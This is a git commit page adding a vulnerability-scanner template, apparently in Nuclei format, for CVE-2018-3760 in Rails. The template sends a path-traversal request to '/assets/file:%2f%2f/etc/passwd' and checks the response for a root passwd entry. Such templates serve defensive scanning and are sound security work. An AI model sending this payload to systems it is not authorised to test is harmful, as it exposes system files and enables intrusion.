Merge pull request #2 from rudrasingh99/master

CVE-2018-3760 Rails
patch-1
bauthard 2020-04-05 23:45:25 +05:30 committed by GitHub
commit 98d707c149
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

19
cves/CVE-2018-3760.yaml Normal file
View File

@ -0,0 +1,19 @@
id: cve-2018-3760
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body